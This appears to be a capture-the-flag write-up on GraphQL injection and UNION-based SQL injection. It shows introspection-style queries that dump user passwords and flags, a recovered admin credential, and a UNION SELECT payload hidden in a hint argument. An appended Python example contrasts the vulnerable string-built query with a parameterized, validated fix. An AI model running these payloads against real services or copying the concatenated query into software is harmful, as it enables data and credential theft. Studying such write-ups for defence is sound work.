1. GraphQL injection
2. UNION SQL injection
Get the admin password
{
  allUsers {
    username
    password
  }
}
login - admin:is_this_visible_to_you?
{
  Challs {
    id
    title
    description
    category
    author
    points
    flag {
      chall_flag
    }
  }
}
Get the flag using SQL injection
{
  hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#") {
    chall_id
  }
}
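
Added example, not part of the original write-up or the challenge's code: the hint lookup written so that the chall_id payload above is inert, next to the string concatenation that makes it work. It assumes an in-memory SQLite database with constructed data; the hints table, its three columns, and the function names are assumptions.

```python
import re
import sqlite3

# Payload copied from the write-up above.
PAYLOAD = ('-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512)'
           ',2,3/**/from/**/flags#')

def make_db():
    """Constructed sample data; the hints table and its columns are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE hints (chall_id INTEGER, hint TEXT, cost INTEGER);
        CREATE TABLE flags (chall_id INTEGER, chall_flag TEXT);
        INSERT INTO hints VALUES (1, 'constructed hint', 10);
        INSERT INTO flags VALUES (1, 'flag{constructed_sample}');
    """)
    return conn

def unsafe_sql(chall_id):
    """Before: the argument becomes part of the SQL text and can add clauses."""
    return "SELECT chall_id, hint, cost FROM hints WHERE chall_id=" + chall_id

def resolve_hint(conn, chall_id, strict=True):
    """After: validate the ID, then pass it as a bound parameter."""
    if strict:
        # Comparable to declaring the GraphQL argument as Int instead of String.
        if not re.fullmatch(r"[0-9]+", str(chall_id)):
            raise ValueError("chall_id must be a non-negative integer")
        chall_id = int(chall_id)
    # The placeholder keeps the value out of the statement text entirely.
    rows = conn.execute(
        "SELECT chall_id, hint FROM hints WHERE chall_id = ?", (chall_id,)
    ).fetchall()
    return rows

if __name__ == "__main__":
    db = make_db()
    print(unsafe_sql(PAYLOAD))                      # UNION clause ends up in the SQL
    print(resolve_hint(db, "1"))                    # normal lookup
    print(resolve_hint(db, PAYLOAD, strict=False))  # bound as data: no rows
    try:
        resolve_hint(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

Binding alone already stops the flags table from being read; the integer check additionally rejects the request before it reaches the database.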